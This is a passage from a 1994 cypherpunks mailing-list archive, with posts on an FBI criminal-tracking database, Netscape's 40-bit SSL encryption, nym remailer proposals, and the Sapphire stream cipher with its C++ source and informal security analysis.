MESSAGE----- I'm watching a congressional hearing on C-SPAN about the "Computer Criminal Tracking System." Jim Martin of the National Consortium for Justice Information and Statistics is testifying, describing an FBI database under development. As an example of its intended use, he gave the following example: A hitchhiker could be stopped by police and required to submit fingerprints. These fingerprints could transmitted digitally to obtain instant identification and "criminal history" information about the hitchhiker. Criminal history information would include information from federal, state, and local authorities. Mr. Martin also observed that, while existing Justice Information databases are now used only for law-enforcement, firearms licensing, and "national security purposes," he envisions that the new database could be expanded in its uses to include "non-criminal justice" applications. Why should I have to provide fingerprint identification on demand to cops? What are the "national security" applications of existing databases? Imagine all the potential "non-criminal justice" applications for the new database. What happens when this database gets linked up to the "citizen tracking and employment eligibility" database under construction? Do we then have a de facto (cardless) national ID? I think so. -----BEGIN PGP SIGNATURE----- Version: 2.9.i iAMtyPingInAfakeKeYBecaUSeSomePeoPleOnACErtaINMailiNGLIStarereQU IRinGtheUseoFDiGiTaLSiGNAturES.DoESTHIsMaKEaNYSenSEtoyOU?ItDoESN 'TTOMEsOIAMdoINgTHisInsTEAdblAHBLahbLAHbLahBlAHBlahBlahbLAHBlahb blAHBlahbLAh blAHb -----END PGP SIGNATURE-----  From merriman at metronet.com Sat Dec 10 14:45:46 1994 From: merriman at metronet.com (David K. Merriman) Date: Sat, 10 Dec 94 14:45:46 PST Subject: Big Brother database Message-ID: <199412102245.AA12412@metronet.com> -----BEGIN PGP SIGNED MESSAGE----- The above line is a recycled pgp signature header. Save those bits! > >Mr. Martin also observed that, while existing Justice Information >databases are now used only for law-enforcement, firearms licensing, >and "national security purposes," he envisions that the new >database could be expanded in its uses to include "non-criminal justice" >applications. Oh, hot diggety. >Why should I have to provide fingerprint identification on demand to >cops? 'cause they'll shoot you or toss you in jail if you don't? > >What are the "national security" applications of existing databases? Finding out which spys in the CIA have been deducting payments on their new Jaguars. > >Imagine all the potential "non-criminal justice" applications for the >new database. Child support, vagrancy, alimony, using cash instead of plastic, parking tickets, income taxes, state taxes, municipal taxes, tax taxes, environmental terrorism (remember that tree in your yard you cut down?), jaywalking, having a hole in your sneakers, picking your nose, Un-American activities (ie, disagreeing with the Kongress), Tax Fraud (ie, trying not to give any more your money than you have to to the Tax Gestapo), reading books on the Prohibited Publications List, Violation of National Health Policy (ie, eating junk food, or otherwise placing an 'undue burden' on the National Health Kare System), and any other kind of mopery and dopery they can think up. If you can think of it or do it, they'll make it illegal, immoral, or Socially Irresponsible. > >What happens when this database gets linked up to the "citizen >tracking and employment eligibility" database under construction? grab your ankles. >Do we then have a de facto (cardless) national ID? I think so. You got it, Bunky. -----BEGIN PGP SIGNATURE----- Version: 3.141592654 ThIsIsAfAkEsIgNaTuReBlOcKsOtHaTtHeSiLlYcYpHeRpUnKsReMaIlErAtToAd DoEsNoTtHrOwUp,IfYoUCaNrEaDtHiS,ThEnYoUnEeDtOgOoUtAnDbUyYoUrSeLf SoMeViSiNeToMaKeYoUrEyEsFeElBeTtEr-PlEaSeAcCePtMyApOlOgIeSfOrThE rIdIcUlOuSnAtUrEoFtHiSuSeLeSsBiToFcRyPtO- FlUfF -----END PGP SIGNATURE----- - - - - - - - - - - - - - - - - - - - - - - - - - - Finger merriman at fohnix.metronet.com for PGP public key and fingerprint. PGP encrypted Email welcome, encouraged, and preferred. "Those who make peaceful revolution impossible will make violent revolution inevitable." John F. Kennedy From perry at imsi.com Sat Dec 10 15:51:42 1994 From: perry at imsi.com (Perry E. Metzger) Date: Sat, 10 Dec 94 15:51:42 PST Subject: BofA+Netscape In-Reply-To: <199412101803.KAA06370@desiree.teleport.com> Message-ID: <9412102351.AA09781@snark.imsi.com> Alan Olsen says: > If you check their WWW page, you will find information on the Secure Sockets > Layer. It explains the algorythm used (RC4) and key size (40 bits). 40 bit RC4 will not stop any attacker with even moderate resources; its crap. Also, its not clear we need Yet Another Encryption On Top Of Sockets protocol. .pm From jim at acm.org Sat Dec 10 15:56:15 1994 From: jim at acm.org (Jim Gillogly) Date: Sat, 10 Dec 94 15:56:15 PST Subject: Big Brother database In-Reply-To: <199412102245.AA12412@metronet.com> Message-ID: <9412102355.AA03584@mycroft.rand.org> > merriman at metronet.com (David K. Merriman) writes: > -----BEGIN PGP SIGNATURE----- > Version: 3.141592654 > ThIsIsAfAkEsIgNaTuReBlOcKsOtHaTtHeSiLlYcYpHeRpUnKsReMaIlErAtToAd ... > -----END PGP SIGNATURE----- Sorry, your signature block doesn't check. My Pentium says the version number should actually be 3.14321865. Hope this helps. Jim Gillogly 20 Foreyule S.R. 1994, 23:55 From eagle at deepthought.armory.com Sat Dec 10 18:39:45 1994 From: eagle at deepthought.armory.com (Jeff Davis) Date: Sat, 10 Dec 94 18:39:45 PST Subject: Algorithm Example Question Message-ID: <9412101839.aa24547@deepthought.armory.com> -----BEGIN PGP SIGNED MESSAGE----- What is the Knapsack algorithm and could someone please give me an example of it? Is this single time key encryption? Thanks. -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAwUBLupl0V/ScHuGXWgVAQHgPwQAi9n9ucLZCAAYdzFxNXzVeduPptzLLrmL sHVW1FJZuY00IR3psFxBb7ZZfl5ZXqdMT+CfzKBG5uIk13kKFyW7/HqOIWjsg3zj cAof9Nb2kFvojClAV79FSyc9B3Quch5KqA/gFngCatjMPid3+1JWVebUY2H7AWf8 cF2hl/nGthI= =7n9l -----END PGP SIGNATURE----- -- According to John Perry Barlow: *Join EFF* "Jeff Davis is a truly gifted trouble-maker." *email * *** O U T L A W S On The E L E C T R O N I C F R O N T I E R **** "When cryptography is outlawed, bayl bhgynjf jvyy unir cevinpl!" JPB From mpj at netcom.com Sat Dec 10 20:31:32 1994 From: mpj at netcom.com (Michael Paul Johnson) Date: Sat, 10 Dec 94 20:31:32 PST Subject: The Sapphire Stream Cipher Message-ID: THE SAPPHIRE STREAM CIPHER The Sapphire Stream Cipher is designed to have the following properties: * Be useful for generation of cryptographic check values as well as protecting message privacy. * Accept a variable length key. * Strong enough to justify _at least_ a 64 bit key for balanced security. * Small enough to be built into other applications with several keys active at once. * Key setup fast enough to support frequent key change operations but slow enough to discourage brute force attack on the key. * Fast enough to not significantly impact file read & write operations on most current platforms. * Portable among common computers and efficient in C, C++, and Pascal. * Byte oriented. * Include both ciphertext and plain text feedback (for both optimal data hiding and value in creation of cryptographic check values). * Acceptable performance as a pure pseudorandom number generator without providing a data stream for encryption or decryption. * Design in a little extra strength where there is doubt about what attacks might be a threat. HISTORY AND RELATED CIPHERS The Sapphire Stream Cipher is very similar to a cipher I started work on in November 1993. It is also similar in some respects to the alledged RC-4 that was posted to sci.crypt recently. Both operate on the principle of a mutating permutation vector. Alledged RC-4 doesn't include any feedback of ciphertext or plain text, however. This makes it more vulnerable to a known plain text attack, and useless for creation of cryptographic check values. On the other hand, alledged RC-4 is faster. The Sapphire Stream Cipher is used in the shareware product Quicrypt, which is available at ftp://ftp.csn.net/mpj/qcrypt10.zip and on the Colorado Catacombs BBS (303-772-1062). There are two versions of Quicrypt: the exportable version (with a session key limited to 32 bits but with strong user keys allowed) and the commercial North American version (with a session key of 128 bits). A variant of the Sapphire Stream Cipher is also used in the shareware program Atbash, which has no weakened exportable version. I don't recall ever reading anything about using a stream cipher like this for the generation of cryptographic check values, but it seems like it should be a fast technique compared to some existing hash functions. OVERVIEW The Sapphire Stream Cipher is based on a state machine. The state consists of 5 index values and a permutation vector. The permutation vector is simply an array containing a permutation of the numbers from 0 through 255. Five of the bytes in the permutation vector are moved to new locations (which may be the same as the old location) for every byte output. The output byte is a nonlinear function of all 5 of the index values and 7 of the bytes in the permutation vector, thus frustrating attempts to solve for the state variables based on past output. On initialization, the index variables are set (somewhat arbitrarily) to 1, 3, 5, 7, and 11. The permutation vector (called the cards array in the source code below) is shuffled based on the user key. This shuffling is done in a way that is designed to minimize the bias in the destinations of the bytes in the array. The biggest advantage in this method is not in the elimination of the bias, per se, but in slowing down the process slightly to make brute force attack more expensive. Eliminating the bias (relative to that exhibited by RC-4) is nice, but this advantage is probably of minimal cryptographic value. KEY SETUP Key setup (illustrated by the function initialize(), below) consists of three parts: 1. Initialize the index variables. 2. Set the permutation vector to a known state (a simple counting sequence). 3. Starting at the end of the vector, swap each element of the permutation vector with an element indexed somewhere from 0 to the current index (chosen by the function keyrand()). The keyrand() function returns a value between 0 and some maximum number based on the user's key, the current state of the permutation vector, and an index running sum called rsum. Note that the length of the key is used in keyrand(), too, so that a key like "abcd" will not result in the same permutation as a key like "abcdabcd". ENCRYPTION Each encryption involves updating the index values, moving (up to) 5 bytes around in the permutation vector, selecting an output byte, and adding the output byte bitwise modulo-2 (exclusive-or) to the plain text byte to produce the cipher text byte. The index values are incremented by different rules. The index called rotor just increases by one (modulo 256) each time. Ratchet increases by the value in the permutation vector pointed to by rotor. Avalanche increases by the value in the permutation vector pointed to by another byte in the permutation vector pointed to by the last cipher text byte. The last plain text and the last cipher text bytes are also kept as index variables. See the function called encrypt(), below for details. PSUEDORANDOM BYTE GENERATION If you want to generate random numbers without encrypting any particular ciphertext, simply encrypt 0. There is still plenty of complexity left in the system to ensure unpredictability (if the key is not known) of the output stream when this simplification is made. DECRYPTION Decryption is the same as encryption, except for the obvious swapping of the assignments to last_plain and last_cipher and the return value. See the function decrypt(), below. C++ SOURCE CODE FRAGMENT The original implimentation of this cipher was in Object Oriented Pascal, but C++ is available for more platforms. /* sapphire.h -- Interface for the Saphire stream cipher. Dedicated to the Public Domain the author and inventor (Michael Paul Johnson). This code comes with no warranty. Use it at your own risk. Ported from the Pascal implementation of the Sapphire Stream Cipher 9 December 1994. unsigned char is assumed to be 8 bits. If it is not, the results of assignments need to be reduced to 8 bits with & 0xFF or % 0x100, whichever is faster. */ class sapphire { // These variables comprise the state of the state machine. unsigned char cards[256]; // A permutation of 0-255. unsigned char rotor, // Index that rotates smoothly ratchet, // Index that moves erratically avalanche, // Index heavily data dependent last_plain, // Last plain text byte last_cipher; // Last cipher text byte // This function is used by initialize(), which is called by the // constructor. unsigned char keyrand(int limit, unsigned char *user_key, unsigned char keysize, unsigned char *rsum, unsigned *keypos); public: sapphire(unsigned char *key = NULL, // Calls initialize if a real unsigned char keysize=0); // key is provided. If none // is provided, call initialize // before encrypt or decrypt. ~sapphire(); // Destroy cipher state information. void initialize(unsigned char *key, // User key is used to set unsigned char keysize); // up state information. unsigned char encrypt(unsigned char b = 0); // Encrypt byte // or get a random byte. unsigned char decrypt(unsigned char b); // Decrypt byte. void burn(void); // Destroy cipher state information. }; /* sapphire.cpp -- the Saphire stream cipher class. Dedicated to the Public Domain the author and inventor: (Michael Paul Johnson). This code comes with no warranty. Use it at your own risk. Ported from the Pascal implementation of the Sapphire Stream Cipher 9 December 1994. */ #include #include "sapphire.h" unsigned char sapphire::keyrand(int limit, unsigned char *user_key, unsigned char keysize, unsigned char *rsum, unsigned *keypos) { unsigned u, // Value from 0 to limit to return. retry_limiter, // No infinite loops allowed. mask; // Select just enough bits. retry_limiter = 0; mask = 1; // Fill mask with enough bits to cover while (mask < limit) // the desired range. mask = (mask << 1) + 1; do { *rsum = cards[*rsum] + user_key[(*keypos)++]; if (*keypos >= keysize) { *keypos = 0; // Recycle the user key. *rsum += keysize; // key "aaaa" != key "aaaaaaaa" } u = mask & *rsum; if (++retry_limiter > 11) u %= limit; // Prevent very rare long loops. } while (u > limit); return u; } void sapphire::initialize(unsigned char *key, unsigned char keysize) { // Key size may be up to 256 bytes. // Pass phrases may be used directly, with longer length // compensating for the low entropy expected in such keys. // Alternatively, shorter keys hashed from a pass phrase or // generated randomly may be used. For random keys, lengths // of from 4 to 16 bytes are recommended, depending on how // secure you want this to be. int i; unsigned char toswap, swaptemp, rsum; unsigned keypos; // Initialize the indices and data dependencies. // Indices are set to different values instead of all 0 // to reduce what is known about the state of the cards // when the first byte is emitted. rotor = 1; ratchet = 3; avalanche = 5; last_plain = 7; last_cipher = 11; // Start with cards all in order, one of each. for (i=0;i<256;i++) cards[i] = i; // Swap the card at each position with some other card. toswap = 0; keypos = 0; // Start with first byte of user key. rsum = 0; for (i=255;i>=0;i--) { toswap = keyrand(i, key, keysize, &rsum, &keypos); swaptemp = cards[i]; cards[i] = cards[toswap]; cards[toswap] = swaptemp; } toswap = swaptemp = rsum = 0; keypos = 0; } sapphire::sapphire(unsigned char *key, unsigned char keysize) { if (key && keysize) initialize(key, keysize); } void sapphire::burn(void) { // Destroy the key and state information in RAM. memset(cards, 0, 256); rotor = ratchet = avalanche = last_plain = last_cipher = 0; } sapphire::~sapphire() { burn(); } unsigned char sapphire::encrypt(unsigned char b) { // Picture a single enigma rotor with 256 positions, rewired // on the fly by card-shuffling. // This cipher is a variant of one invented and written // by Michael Paul Johnson in November, 1993. unsigned char swaptemp; // Shuffle the deck a little more. ratchet += cards[rotor++]; swaptemp = cards[last_cipher]; cards[last_cipher] = cards[ratchet]; cards[ratchet] = cards[last_plain]; cards[last_plain] = cards[rotor]; cards[rotor] = swaptemp; avalanche += cards[swaptemp]; // Output one byte from the state in such a way as to make it // very hard to figure out which one you are looking at. last_cipher = b^cards[cards[(cards[ratchet] + cards[rotor] + cards[last_plain] + cards[last_cipher] + cards[avalanche])&0xFF]]; last_plain = b; return last_cipher; } unsigned char sapphire::decrypt(unsigned char b) { unsigned char swaptemp; // Shuffle the deck a little more. ratchet += cards[rotor++]; swaptemp = cards[last_cipher]; cards[last_cipher] = cards[ratchet]; cards[ratchet] = cards[last_plain]; cards[last_plain] = cards[rotor]; cards[rotor] = swaptemp; avalanche += cards[swaptemp]; // Output one byte from the state in such a way as to make it // very hard to figure out which one you are looking at. last_plain = b^cards[cards[(cards[ratchet] + cards[rotor] + cards[last_plain] + cards[last_cipher] + cards[avalanche])&0xFF]]; last_cipher = b; return last_plain; } GENERATION OF CRYPTOGRAPHIC CHECK VALUES (HASH VALUES) For a fast way to generate a cryptographic check value (also called a hash or message integrity check value) of a message of arbitrary length, simply generate a set of 20 bytes (160 bits) by encrypting zeroes. The output so generated is the cryptographic check value. To generate a cryptographic check value when message integrity is desired but encryption is not (for example, as part of a digital signature process), either use a "standard" key (like four bytes of zero) or simply bypass the "card shuffling" part of the key setup (for even more speed). The plain text is still fed to the encrypt function, but the ciphertext is discarded until the check value is generated. SECURITY ANALYSIS There are several security issues to be considered. Some are easier to analyze than others. The following includes more "hand waving" than mathematical proofs, and looks more like it was written by an engineer than a mathematician. The reader is invited to improve upon or refute the following, as appropriate. KEY LENGTH There are really two kinds of user keys to consider: (1) random binary keys, and (2) pass phrases. Analysis of random binary keys is fairly straight forward. Pass phrases tend to have much less entropy per byte, but the analysis made for random binary keys applies to the entropy in the pass phrase. The length limit of the key (255 bytes) is adequate to allow a pass phrase with enough entropy to be considered strong. To be real generous to a cryptanalyst, assume dedicated Sapphire Stream Cipher cracking hardware. The constant portion of the key scheduling can be done in one cycle. That leaves at least 256 cycles to do the swapping (probably more, because of the intricacies of keyrand(), but we'll ignore that, too, for now). Assume a machine clock of about 256 MegaHertz (fairly generous). That comes to about one key tried per microsecond. On average, you only have to try half of the keys. Also assume that trying the key to see if it works can be pipelined, so that it doesn't add time to the estimate. Based on these assumptions (reasonable for major governments), and rounding to two significant digits, the following key length versus cracking time estimates result: Key length, bits Time to crack ---------------- ------------- 32 35 minutes (exportable in qcrypt) 33 1.2 hours (not exportable in qcrypt) 40 6.4 days 56 1,100 years (kind of like DES's key) 64 290,000 years (good enough for most things) 80 19 billion years (kind of like Skipjack's key) 128 5.4E24 years (good enough for the clinically paranoid) Naturally, the above estimates can vary by several orders of magnitude based on what you assume for attacker's hardware, budget, and motivation. In the range listed above, the probability of spare keys (two keys resulting in the same initial permutation vector) is small enough to ignore. The proof is left to the reader. INTERNAL STATE SPACE For a stream cipher, internal state space should be at least as big as the number of possible keys to be considered strong. The state associated with the permutation vector alone (256!) constitutes overkill. PREDICTABILITY OF THE STATE If you have a history of stream output from initialization (or equivalently, previous known plaintext and ciphertext), then rotor, last_plain, and last_cipher are known to an attacker. The other two index values, flipper and avalanche, cannot be solved for without knowing the contents of parts of the permutation vector that change with each byte encrypted. Solving for the contents of the permutation vector by keeping track of the possible positions of the index variables and possible contents of the permutation vector at each byte position is not possible, since more variables than known values are generated at each iteration. Indeed, fewer index variables and swaps could be used to achieve security, here, if it were not for the hash requirements. CRYPTOGRAPHIC CHECK VALUE The relatively large portion of the state altered with each byte encrypted (relative to alledged RC-4) contributes to a rapid avalanche of generated check values -- probably more than is needed. A single bit change in a message causes a radical change in the check value generated (about half of the bits change). This is one good feature of a cryptographic check value. Another good property of a cryptographic check value is that it is too hard to compute a message that results in a certain check value. In this case, we assume the attacker knows the key and the contents of a message that has the desired check value, and wants to compute a bogus message having the same check value. There are two obvious ways to do this attack. One is to solve for a sequence that will restore the state of the permutation vector and indices back to what it was before the alteration. The other one is the so-called "birthday" attack that is to cryptographic hash functions what brute force is to key search. To generate a sequence that restores the state of the cipher to what it was before the alteration probably requires at least 256 bytes, since the index "rotor" marches steadily on its cycle, one by one. The values to do this cannot easily be computed, due to the nonlinearity of the feedback, so there would probably have to be lots of trial and error involve. In practical applications, this would leave a gaping block of binary garbage in the middle of a document, and would be quite obvious, so this is not a practical attack, even if you could figure out how to do it (and I haven't). If anyone has a method to solve for such a block of data, though, I would be most interested in finding out what it is. Please email me at m.p.johnson at ieee.org if you find one. The "birthday" attack just uses the birthday paradox to find a message that has the same check value. With a 20 byte check value, you would have to find at least 80 bits to change in the text such that they wouldn't be noticed (a plausible situation), then try the combinations until one matches. 2 to the 80th power is a big number, so this isn't practical either. If this number isn't big enough, you are free to generate a longer check value with this algorithm. Someone who likes 16 byte keys might prefer 32 byte check values for similar stringth. OTHER HOLES Are there any? Take you best shot and let me know if you see any. I offer no challenge text with this algorithm, but you are free to use it without royalties to me if it is any good. LEGAL STUFF The intention of this document is to share some research results on an informal basis. You may freely use the algorithm and code listed above as far as I'm concerned, as long as you don't sue me for anything, but there may be other restrictions that I am not aware of to your using it. The C++ code fragment above is just intended to illustrate the algorithm being discussed, and is not a complete application. I understand this document to be Constitutionally protected publication, and not a munition, but don't blame me if it explodes or has toxic side effects. ___________________________________________________________ | | |\ /| | | Michael Paul Johnson Colorado Catacombs BBS 303-772-1062 | | \/ |o| | PO Box 1151, Longmont CO 80502-1151 USA Jesus is alive! | | | | / _ | mpj at csn.org aka mpj at netcom.com m.p.johnson at ieee.org | | |||/ /_\ | ftp://ftp.csn.net/mpj/README.MPJ CIS: 71331,2332 | | |||\ ( | ftp://ftp.netcom.com/pub/mp/mpj/README -. --- ----- .... | | ||| \ \_/ | PGPprint=F2 5E A1 C1 A6 CF EF 71 12 1F 91 92 6A ED AE A9 | |___________________________________________________________| From amanda at intercon.com Sat Dec 10 21:52:09 1994 From: amanda at intercon.com (Amanda Walker) Date: Sat, 10 Dec 94 21:52:09 PST Subject: BofA+Netscape Message-ID: <199412110551.AAA19376@intercon.com> > It my personal feeling that Netscape doesn't have the right > talent mix to develop secure software. It's my personal feeling that Netscape doesn't have the right talent mix to develop *any* Internet software, secure or not. Although, I have to say, I've never seen a startup that pissed off so much of the Internet industry and user community in so short a time. Even Apple & Microsoft agree that Netscape is brain dead... Amanda Walker InterCon Systems Corporation From jamesd at netcom.com Sat Dec 10 22:26:21 1994 From: jamesd at netcom.com (James A. Donald) Date: Sat, 10 Dec 94 22:26:21 PST Subject: Algorithm Example Question In-Reply-To: <9412101839.aa24547@deepthought.armory.com> Message-ID: <199412110605.WAA15114@netcom9.netcom.com> Jeff Davis writes > > > -----BEGIN PGP SIGNED MESSAGE----- > > What is the Knapsack algorithm and could someone please give me an example > of it? Is this single time key encryption? > > Thanks. Well the main thing you need to know about the knapsack problem is that crypto schemes based on the knapsack problem get broken with depressing regularity. -- --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From shamrock at netcom.com Sat Dec 10 23:31:31 1994 From: shamrock at netcom.com (Lucky Green) Date: Sat, 10 Dec 94 23:31:31 PST Subject: BofA+Netscape Message-ID: Amanda Walker wrote: >> It my personal feeling that Netscape doesn't have the right >> talent mix to develop secure software. > >It's my personal feeling that Netscape doesn't have the right talent mix to >develop *any* Internet software, secure or not. Although, I have to say, >I've never seen a startup that pissed off so much of the Internet industry >and user community in so short a time. Even Apple & Microsoft agree that >Netscape is brain dead... Would you mind elaborating? -- Lucky Green PGP encrypted mail preferred. From lcottrell at popmail.ucsd.edu Sun Dec 11 00:05:05 1994 From: lcottrell at popmail.ucsd.edu (Lance Cottrell) Date: Sun, 11 Dec 94 00:05:05 PST Subject: nym based remailer proposals Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Current nym based remailers suffer from the same insecurity that all return address share. It is easy for an opponent to trace a return address by sending many messages to that address, and watching the traffic generated. If the remailer uses a database of nyms to real names (like Julf's penet remailer) then all security rests with the integrity of the operator and the security of that one system. These security problems can be avoided, while still providing the benefits of a "replyable" address. I suggested the following scheme at the last San Diego Cypherpunks meeting. It was well received there, so I hope it will be of interest. Having read the help files, this is my understanding of how the current nym based remailers work. I send an anonymous reply block to the nym remailer, which puts it in a database, along with my chosen nym. This can all be done through remailers. Now anyone can send mail to nym at remailer.address.com and it will be sent to me using the reply block I sent. I propose two changes: 1) To facilitate replying to nyms, I should be able to send mail to the remailer indicating the nym it should appear to be from. Then a recipient would simply hit reply, and the response would go back to the real sender. 2) I propose the use of message pools rather than return addresses. With enough subscribers, the best way to do this would be using mailing lists. There already exist many tools which could filter out all pool message other than yours. Until that time, alt.anonymous.messages would be a better choice. To be practical, both of these schemes require that the user be able to filter out messages to other nyms. The remailer (which might be better called a nym server) should place the subject line of the incoming reply in the body of the message, and replace the subject line with some searchable string (e.g. To Nym: Pr0duct Cypher). Searching alt.anonymous.messages for your nym in the subject line would reveal all messages to you. While the current system would allow me to have messages sent to a message pool using a mail-to-news gateway, I am not now able to search for messages to me, and I can not send messages "From: " my nym. -Lance (Ice Weasel) Cottrell -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAwUBLuqx5VVkk3dax7hlAQE2UAP9FEBCHyRZid7oAXHqSf2OUk63uMKzBSaE ftW5WYkXJNfyeZFXlsMqfgBorB9LBzdza4xAM+V31zKuBBe4n//i29TE25vN+Qwq FAiAQ0L4tj6KiTl/Yt7alw6b6aLm60Hj9C3MsRRAj3hBnUo2b3VViR+W9bE2n7Ox pHtTUnQQIRA= =P/bW -----END PGP SIGNATURE----- -------------------------------------------------- Lance Cottrell who does not speak for CASS/UCSD loki at nately.ucsd.edu PGP 2.6 key available by finger or server. Encrypted mail welcome. Home page http://nately.ucsd.edu/~loki/ Home of "chain" the remailer chaining script. For anon remailer info, mail remailer at nately.ucsd.edu Subject: remailer-help "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche From tcmay at netcom.com Sun Dec 11 01:19:36 1994 From: tcmay at netcom.com (Timothy C. May) Date: Sun, 11 Dec 94 01:19:36 PST Subject: "Crypto Anarchy and Virtual Communities" Message-ID: <199412110919.BAA10461@netcom6.netcom.com> I discovered today at the Cypherpunks meeting what happened to the posts of my paper I made to the list. I converted the FrameMaker version of a paper (to be presented in Monte Carlo in early February) to plain text, with attempts to clean up most of the non-standard ASCII stuff. This paper was 43K in length, and I posted it, figuring most of you could handle it (save it, dump it, etc.). So I posted it on Wednesday. It didn't appear. So I tried again on Friday. Still nothing...and no bounce messages, no nothing. Well, Eric told me today that all messages above some size (40K, he recalls) are routed to a mailbox for manual processing. He hasn't checked it recently, so.... I hate to put files in my ftp account, as Netcom's ftp site is grossly overcrowed and nearly all attempts to access it fail. (Netcommies are roadkill on the I-way.)) But it is there, at ftp.netcom.com, in pub/tc/tcmay. (Full address for direct access is: /ftp/pub/tc/tcmay. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From lmccarth at ducie.cs.umass.edu Sun Dec 11 02:08:18 1994 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Sun, 11 Dec 94 02:08:18 PST Subject: manual processing of big list messages Message-ID: <199412111013.FAA19099@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Tim May writes: > Well, Eric told me today that all messages above some size (40K, he > recalls) are routed to a mailbox for manual processing. He hasn't > checked it recently, so.... The next question is, does Eric manually delay long unsigned messages for longer than long signed messages ? ;} - - -L. Futplex McCarthy "Why did I say that ? `Cause it's a motherfuckin' fact !" --Us3 - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLurPf2f7YYibNzjpAQHJ0wP/aF/BnAkAHbbxnHL46+QqeCKNH+TXfHX2 gwk0PVfdMVr4+5xnn+lBVma2cBwWJYauXD2paZkbr+98GeM3eGoi9E4LoHveQmlo yZ+arNI4Gks83OkdXlS1+94Eaed/hTbK2TQFAplPs++2T6jyCYBE3jzSL9Ql0oXu RH09NRyeQ0E= =Ergc - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLurQrCoZzwIn1bdtAQFITwF+Ju4Y06w3JHrtRImQ6Y9AiBJXUF1+92Es MasfVZJdFg1M7XmjMEZZ2lEW1eecjm0U =xz4P -----END PGP SIGNATURE----- From geoffrey at crl.com Sun Dec 11 06:33:16 1994 From: geoffrey at crl.com (Geoffrey Faivre-Malloy) Date: Sun, 11 Dec 94 06:33:16 PST Subject: BofA+Netscape (fwd) Message-ID: >> It my personal feeling that Netscape doesn't have the right >> talent mix to develop secure software.> > >It's my personal feeling that Netscape doesn't have the right talent mix to >develop *any* Internet software, secure or not. Although, I have to say, >I've never seen a startup that pissed off so much of the Internet industry What have they done to piss people off? >and user community in so short a time. Even Apple & Microsoft agree that >Netscape is brain dead... > > >Amanda Walker >InterCon Systems Corporation From rfb at lehman.com Sun Dec 11 07:53:00 1994 From: rfb at lehman.com (Rick Busdiecker) Date: Sun, 11 Dec 94 07:53:00 PST Subject: BofA+Netscape In-Reply-To: <199412110551.AAA19376@intercon.com> Message-ID: <9412111550.AA29913@cfdevx1.lehman.com> Date: Sun, 11 Dec 1994 00:51:46 -0500 From: Amanda Walker It's my personal feeling that Netscape doesn't have the right talent mix to develop *any* Internet software, secure or not. Well, I can't and won't attempt to speak to the overall mix of talent, however I think that such a strong statement really needs to be accompanied by some sort of an explanation. For what it's worth, I have worked closely with one of the members of Netscape's team and have continued to stay in touch with him over the years since we worked together. I'm quite confident of his stylistic and technical abilities and I believe that he deserves better than the unsubstantiated slam that you've delivered. Even Apple & Microsoft agree that Netscape is brain dead... I'm assuming that you see agreement with Apple and/or Microsoft as a positive. That position is not universally held. Rick From db at Tadpole.COM Sun Dec 11 08:48:32 1994 From: db at Tadpole.COM (Doug Barnes) Date: Sun, 11 Dec 94 08:48:32 PST Subject: BofA+Netscape In-Reply-To: <9412111550.AA29913@cfdevx1.lehman.com> Message-ID: <9412111647.AA23311@tadpole.tadpole.com> > > Date: Sun, 11 Dec 1994 00:51:46 -0500 > From: Amanda Walker > > It's my personal feeling that Netscape doesn't have the right talent mix to > develop *any* Internet software, secure or not. > > Well, I can't and won't attempt to speak to the overall mix of talent, > however I think that such a strong statement really needs to be > accompanied by some sort of an explanation. I'll throw in that from the perspective of someone running a server, their approach of requesting all graphics simultaneously over different sockets in the name of client performance is disastrous. This causes most servers to fork N times more per page, where N is the avg. # of graphics. Not that this shouldn't eventually be dealt with by some way to request the whole ball of wax in a single package, but some have speculated that this was done deliberately in order sabotage server software other than their own. (Their original business model, as I understand it, was to give clients away for free and sell server software.) Also, their flip-flops on what they plan to charge for, and what will be free... for instance, they initially lead folks to believe that the client would be free, encouraging many to adopt it, only to find out that later versions would only be free for a narrowly drawn group of individuals. I have nothing against shareware/demoware, when it is clearly labelled as such... this is just mildly slimy. I will say though, that their Windows version crashes substantially less than the NCSA one, which is increasingly my metric for stuff I inflict on my users. Fortunately, there are a _lot_ of other commercial options coming out that I can chose from on the basis of price, performance, not crashing, trust in the developers' integrity, etc. Doug From anonymous-remailer at shell.portal.com Sun Dec 11 09:01:01 1994 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Sun, 11 Dec 94 09:01:01 PST Subject: NYM REMAILER PROPOSAL Message-ID: <199412111705.MAA22181@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- lcottrell at popmail.ucsd.edu (Lance Cottrell) is known to have said: LC>I propose two changes: >1) To facilitate replying to nyms, I should be able to send mail to the >remailer indicating the nym it should appear to be from. Then a recipient >would simply hit reply, and the response would go back to the real sender. LC>2) I propose the use of message pools rather than return addresses. With >enough subscribers, the best way to do this would be using mailing lists. >There already exist many tools which could filter out all pool message >other than yours. Does anyone have the help-file for the anonymous pool of the extropia- remailer, the one of ? In the interest of widespread usage, please post it to the entire list. If you can, please also let us know if there is a way for us to subscribe via an anonymous remailer to an address we designate, like for instance with the command subscribe special at address.here where the special address given is obviously different from the one in the header of the subscription message (which would merely be a remailer). - ----------------------------------- Does anyone know more about Sameer's C2-services? In the interest of widespread usage, please post a summary to the entire cypherpunks-list. Also urge others to copy, forward and post elsewhere. - ----------------------------------- Last, I support the idea of a while ago that the remailer-operators mailing list should be open for public subscription so all those interested can get on and follow what is happened there. But 